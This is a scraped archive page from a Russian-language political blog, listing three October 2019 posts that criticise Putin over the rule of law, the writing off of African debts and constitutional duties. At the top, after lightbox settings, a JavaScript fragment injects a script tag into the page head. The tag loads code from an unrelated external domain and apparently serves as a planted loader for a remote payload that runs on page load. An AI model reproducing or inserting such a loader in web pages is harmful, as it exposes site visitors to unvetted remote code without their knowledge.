, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Архив за октября, 2019

Почему при Путине Россия так и не стала правовым государством?

31 Окт

Единственный источник власти в стране, многонациональный народ, выразив свою волю в Конституции России, дал в качестве наказа лицам, осуществляющим государственную власть, сделать страну «правовым государством».

Конституции уже более 25 лет, но Россия так и не стала правовым государством. Об этом свидетельствуют многочисленные факты того, что россияне, их права и свободы так и не стали  высшей ценностью, а лица, осуществляющие государственную власть, так и не научились  признавать, соблюдать и защищать права и свободы россиян.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Жители Африки Путину дороже россиян?

24 Окт

Путин сообщил https://www.interfax.ru/business/681455  о списании Россией долгов африканских стран на $20 млрд. В рублях это более 1 триллиона 300 млрд.

Внешний вид тех, кто прибыл из Африки в Сочи, убеждает, что бедствующих среди них не было.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Что происходит со страной, когда Путин не исполняет обязанности гаранта Конституции?

13 Окт

Признаю, многое Путину удалось, но россияне так и не стали высшей ценностью в стране.

Двадцать лет осуществления государственной  власти Путиным доказали его неспособность быть гарантом Конституции, неспособность исполнить волю единственного источника власти в стране, многонационального народа, изложенную в Конституции России.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки